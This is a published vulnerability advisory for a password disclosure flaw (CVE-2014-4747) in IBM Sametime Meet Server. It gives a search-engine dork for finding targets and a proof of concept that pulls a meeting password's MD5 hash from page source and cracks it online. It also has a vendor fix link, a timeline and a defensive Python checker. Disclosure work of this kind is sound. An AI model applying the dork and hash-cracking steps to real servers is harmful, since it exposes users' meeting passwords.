IBM Sametime Meet Server 8.5 Password Disclosure

# Exploit Title:   IBM Sametime Meet Server 8.5 Password Disclosure
# Google Dork:     intitle:"Meeting Center - IBM Lotus Sametime"
# Date:     11/08/2014
# CVSS Score:     http://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=AV:L/AC:L/Au:N/C:P/I:N/A:N
# CVE-ID:     http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4747
# OSVDB-ID:     http://osvdb.org/109443
#
# Author:     Adriano Marcio Monteiro
# E-mail:     adrianomarciomonteiro@gmail.com
# Blog:     http://www.brazucasecurity.com.br
#   
# Vendor:     http://www.ibm.com
# Software:     http://www.ibm.com/sametime
# Version:     8.5.1
# Advisory:     https://www-304.ibm.com/support/docview.wss?uid=swg21679221
#   
# Test Type:     Black Box
# Tested on:     Windows 7 Enterprise SP1 x86 pt-br, Mozilla Firefox 30.0 / Internet Explorer 10 / Google Chrome Version 33.0.1750.146 m



Table of Contents

[0x00] The Vulnerability
[0x01] Exploit Description
[0x02] PoC - Proof of Concept
[0x03] Correction or Workaround
[0x04] Timeline
[0x05] Published
[0x06] References
[0x07] Bibliography



[0x00] The Vulnerability

  Password Disclosure
  Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.



[0x01] Exploit Description

  On the page that allows editing a meeting, it is possible to retrieve the MD5 hash of the meeting password just by reading the HTML source code of the page.



[0x02] PoC - Proof of Concept

  To exploit this vulnerability, you only need to read the source code of the page.
  
  http://sametime02.myserver.com.br/stconf.nsf/meeting/8635AEFF1CBFAAF283257D09004602CE?editdocument&1404305088536

  [...]
  <input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">
  <input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">
  [...]

  http://www.md5online.org
  E1FAFFB3E614E6C2FBA74296962386B7 -> Found: AAA




[0x03] Correction or Workaround

  Apply the procedures described at the following link:
  http://www-01.ibm.com/support/docview.wss?uid=swg21679454
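
  A check for the condition shown in the PoC, as an added example that is not part of the original advisory or IBM's fix: it parses a saved copy of a meeting edit page and reports any password input that arrives from the server with a pre-filled value. The function and class names and the FIXED_PAGE markup are assumptions; VULNERABLE_PAGE reuses the two input tags quoted in the PoC.

```python
import re
from html.parser import HTMLParser

# Digest-shaped value as quoted in the PoC: 32 hex characters, optionally in parentheses.
DIGEST_RE = re.compile(r"^\(?[0-9A-Fa-f]{32}\)?$")


class PasswordFieldAudit(HTMLParser):
    """Collect <input type="password"> elements that carry a server-supplied value."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":
            return
        a = {k: (v or "") for k, v in attrs}  # valueless attributes come back as None
        if a.get("type", "").lower() != "password":
            return
        value = a.get("value", "").strip()
        if not value:
            return  # empty field: nothing is disclosed to the client
        self.findings.append({
            "name": a.get("name") or a.get("id") or "<unnamed>",
            "line": self.getpos()[0],
            "kind": "digest-like" if DIGEST_RE.match(value) else "other-secret",
            "length": len(value),  # report the length only, never echo the secret
        })


def audit_html(html):
    """Return one finding per pre-filled password field in the given HTML text."""
    parser = PasswordFieldAudit()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: the two input tags from the PoC inside a minimal form.
VULNERABLE_PAGE = """<form>
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="Password" id="pw">
<input type="password" value="(E1FAFFB3E614E6C2FBA74296962386B7)" maxlength="80" size="41" name="ConfirmPassword" id="rpw">
</form>"""

# Constructed sample (assumed shape of a corrected page): same fields, no stored secret.
FIXED_PAGE = VULNERABLE_PAGE.replace('value="(E1FAFFB3E614E6C2FBA74296962386B7)"', 'value=""')
```

  An empty result from audit_html means the page no longer sends the stored secret to the browser; any finding means the edit form still embeds it in the markup.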



[0x04] Timeline

  18/07/2014 - Vulnerabilities discovered
  19/07/2014 - Vulnerabilities reported to IBM PSIRT Team
  23/07/2014 - Advisory and troubleshooting fix published



[0x05] Published

  http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4747
  http://www.securityfocus.com/bid/68823
 


[0x06] References

  Information Leakage
  https://www.owasp.org/index.php/Information_Leakage

  CWE-200: Information Exposure
  http://cwe.mitre.org/data/definitions/200.html



[0x07] Bibliography

  http://www-10.lotus.com/ldd/stwiki.nsf/xpDocViewer.xsp?lookupName=Administering+Sametime+Standard+8.5.2+documentation#action=openDocument&res_title=Sametime_Meeting_Server_st852&content=pdcontent



[end]